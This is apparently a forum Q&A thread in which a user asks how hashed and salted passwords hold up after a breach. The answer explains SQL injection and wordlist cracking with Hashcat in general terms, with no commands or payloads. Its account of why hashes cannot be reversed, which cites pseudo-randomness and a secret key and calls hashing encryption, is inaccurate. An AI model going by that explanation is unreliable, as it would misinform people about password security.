I’m in the process of familiarizing myself with the ins and outs of password security, and what level of screwed you are depending on how a site treated password security before a breach occured.
What I understand so far is that if a site stores plaintext passwords and they’re leaked, anyone can instantly use them to access your account. If the passwords have been hashed, they’re more or less back to brute-forcing passwords and hoping the hash matches. If passwords are salted, extra data is added to the hashes, but (from what I understand) since this is also handled by the site (when you try to log in your password is hashed and salted before being compared to what they have saved), this doesn’t actually change the effectiveness of brute-forcing. I might be missing something here.
Either way, what I’d like to know is how do sites keep the site code itself inaccessible from hackers, if site data, like tables containing user information, can be obtained. Theoretically if a hacker had access to the specific hash and salting being used, they could reverse-engineer the hashed passwords, right? But they don’t, and I don’t understand why they don’t, when they seem to be able to access other data. In previous answers on this topic I’ve seen people say that if hackers had access to site code they could just remove the necessity for a password, or otherwise get around those restrictions, but why can’t they get this access?
In: 15
One example of a way passwords can get breached is a method known as SQLI (Sequel Injection, also known as SQL injection)
This is when unsanitized user input is directly entered into a database, like during log ins, search bars, account creation, etc. Anything with databases are potentially vulnerable. So, using SQLI, hackers are able to extract the hashed password, and sometimes the salt that’s used to hash that password.
However, the site code is stored on a server somewhere, the hackers likely don’t have a way into that server, and therefore cannot extract or change the raw code that is being used.
For your question about hackers obtaining the salt and hash for a password, you ask why they can’t reverse-engineer the hashed password. That’s simply because it’s not possible. Modern day algorithms that are encrypting these passwords have some degree of pseudo randomness, which hackers will not be able to reverse engineer without (as an example) a secret key, or something similar. However, what they can do is run the hashed password and salt through a program called HashCat. This takes in a wordlist of potential passwords, the password you want to try and crack, and some other tools that aren’t always needed. Then, the program will run every password through that hashing algorithm and salt, then compare it to the hashed password you gave it. If they match, the program stops and you have successfully cracked the password. If it ends without cracking, it means it’s run through the entire wordlist of passwords and didn’t find a correct one
Latest Answers